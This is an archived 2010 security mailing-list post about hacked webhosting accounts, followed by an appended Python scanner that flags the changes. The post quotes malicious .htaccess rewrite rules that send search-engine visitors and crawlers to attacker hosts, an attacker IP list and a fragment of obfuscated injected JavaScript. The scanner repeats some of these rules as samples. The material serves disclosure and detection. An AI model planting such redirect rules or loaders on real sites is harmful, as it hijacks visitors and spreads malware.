[nsp-sec] Old hack, popular again.
Scott A. McIntyre
scott at xs4all.net
Fri Jan 8 02:13:26 EST 2010
Hi all,
Over the last week or two we've had a real rise in webhosting accounts where FTP credentials were abused to upload and modify various files in a customer's hosting space. Malicious JavaScript (I can send examples to those who want, some of it is very large and obfuscated) insertions into every HTML document is just one of the standard changes, but perhaps more interesting is that over 40 of these accounts also had their .htaccess updated.
This is a very old hack, and we've seen it rise in popularity every few months, but this was a pretty big "update" so it seemed worth mentioning.
The .htaccess files were modified in a few ways:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://techno-worlds.info/0/go.php?sid=2 [R,L]
Others had RewriteRules to:
RewriteRule .* http://auto-saloon.info/go.php [R,L]
RewriteRule .* http://mayatek.info/0/go.php?sid=2 [R,L]
RewriteRule .* http://stopthebailouts.info/go.php [R,L]
RewriteRule ^(.*)$ http://mefa.ws/2/news.php?s=1c1804616b [R=301,L]
RewriteRule ^(.*)$ http://newsreading.ru/ [R=301,L]
Some changes were relatively simple:
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://p0u.org/ [R=301,L]
Or:
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://webaliance.firm.in/ [R=301,L]
And incredibly simply:
# HostRule
Redirect 301 / http://new-sneg.ru/
# /HostRule
No points for guessing the country of origin of the trespassers...
The JavaScript changes were in some cases simple, others were huge.
The FTP uploads came from a variety of locations:
3462 | 59.125.229.74 | HINET Data Communication Business Group
4323 | 216.120.234.156 | TWTC - tw telecom holdings, inc.
8767 | 193.34.144.189 | MNET-AS M-net AS
8767 | 193.34.144.208 | MNET-AS M-net AS
9680 | 59.125.229.74 | HINETUSA HiNet Service Center in U.S.A
19875 | 69.10.158.23 | IPWORLDNET - IPWorld Networks
21844 | 74.54.217.226 | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
24826 | 91.213.121.91 | KHARKOV-TERMINALS-AS PE Viktor Nastechenko
28753 | 212.95.63.11 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 212.95.63.12 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 84.16.228.66 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 84.16.228.67 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 84.16.229.57 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 84.16.229.58 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 84.16.236.35 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 89.149.241.108 | NETDIRECT AS NETDIRECT Frankfurt, DE
28753 | 89.149.252.17 | NETDIRECT AS NETDIRECT Frankfurt, DE
29873 | 66.96.128.66 | BIZLAND-SD - The Endurance International Group, Inc.
44112 | 77.222.56.28 | SWEB-AS SpaceWeb JSC
48662 | 94.142.134.25 | CSSGROUP-AS SIA _CSS GROUP_
49314 | 91.212.198.131 | NEVAL PE Nevedomskiy Alexey Alexeevich
As I say, most of this is business as usual. What's different was the relatively sudden rise (about a hundred accounts, but still verifying some of those) in only a few days.
If anyone wants the JavaScript, shout, it will take a bit to grep all the various files and find the different variations... I found about a thousand files modified with:
<script>/*LGPL*/ try{ window.onload = function(){var Qgmf39m58nxy = document.createElement('s@^$c$&r#^(i$@)p!$t^!$'.replace(/\)|\(|&|@|\...
And many more variations.
Regards,
Scott A. McIntyre
XS4ALL Internet B.V.
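The post describes two things a hosting operator can scan for after an FTP-credential abuse: .htaccess rewrite rules that redirect visitors to an external host only when the referer or user agent looks like a search engine (or a blanket Redirect of the whole site), and HTML files carrying an injected loader whose tag name is an obfuscated string cleaned up by .replace() at runtime. The following is an added example of such a scanner; it is not code from the post or from XS4ALL. The hostnames in the first three samples are the ones quoted above; the benign .htaccess, the "own_hosts" parameter and the simplified obfuscated string in the HTML sample are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed samples, shaped like the .htaccess modifications quoted in the post.
SAMPLE_REFERER = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://techno-worlds.info/0/go.php?sid=2 [R,L]
"""

SAMPLE_UA = """\
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://p0u.org/ [R=301,L]
"""

SAMPLE_REDIRECT = """\
# HostRule
Redirect 301 / http://new-sneg.ru/
# /HostRule
"""

# Constructed benign file: an HTTPS upgrade and a local path move, nothing conditional
# on who the visitor is and nothing pointing off-site.
SAMPLE_BENIGN = """\
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]
RewriteRule ^old-page$ /new-page [R=301,L]
"""

# Server variables whose use in a RewriteCond means the redirect depends on the visitor.
SUSPECT_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")


def _external_host(target, own_hosts):
    """Hostname of an absolute http(s) target, unless it is one of the site's own hosts."""
    u = urlparse(target)
    if u.scheme not in ("http", "https") or not u.hostname:
        return None
    host = u.hostname.lower()
    return None if host in own_hosts else host


def find_conditional_redirects(htaccess_text, own_hosts=()):
    """Return findings as (kind, condition_variable_or_None, external_host, line_no).

    kind is 'conditional_redirect' for a RewriteRule to an external host guarded by a
    referer/user-agent RewriteCond, or 'blanket_redirect' for 'Redirect [status] / URL'.
    """
    own = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # RewriteCond variables accumulated before the next RewriteRule
    for n, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append(parts[1])
        elif directive == "rewriterule" and len(parts) >= 3:
            host = _external_host(parts[2], own)
            conds = [v for v in pending if any(s in v for s in SUSPECT_VARS)]
            if host and conds:
                findings.append(("conditional_redirect", conds[0], host, n))
            pending = []  # RewriteCond lines only apply to the next RewriteRule
        elif directive == "redirect" and len(parts) >= 3:
            host = _external_host(parts[-1], own)
            if host and parts[-2] == "/":
                findings.append(("blanket_redirect", None, host, n))
    return findings


# Marker of the injected loader quoted in the post: createElement() called on a quoted
# string that is de-obfuscated with .replace(). Hand-written code passes a literal tag name.
INJECTED_JS = re.compile(r"createElement\(\s*'[^']*'\s*\.replace\(")

# Constructed HTML sample; the obfuscation is simplified to a single junk character.
SAMPLE_HTML = (
    "<html><body>hello</body></html>"
    "<script>/*LGPL*/ try{ window.onload = function(){"
    "var x = document.createElement('s@c@r@i@p@t'.replace(/@/g, ''));"
    "};}catch(e){}</script>"
)


def find_injected_script(html_text):
    """Return the offsets of every obfuscated createElement() loader in the document."""
    return [m.start() for m in INJECTED_JS.finditer(html_text)]


if __name__ == "__main__":
    for name, text in (("referer", SAMPLE_REFERER), ("ua", SAMPLE_UA),
                       ("redirect", SAMPLE_REDIRECT), ("benign", SAMPLE_BENIGN)):
        print(name, find_conditional_redirects(text, own_hosts=["www.example.com"]))
    print("html", find_injected_script(SAMPLE_HTML))
```

Run over every .htaccess and .html under the hosting root, the scanner gives a short list of accounts to check rather than a thousand files to read; passing the customer's own hostnames in own_hosts keeps ordinary www/HTTPS canonicalisation rules out of the results.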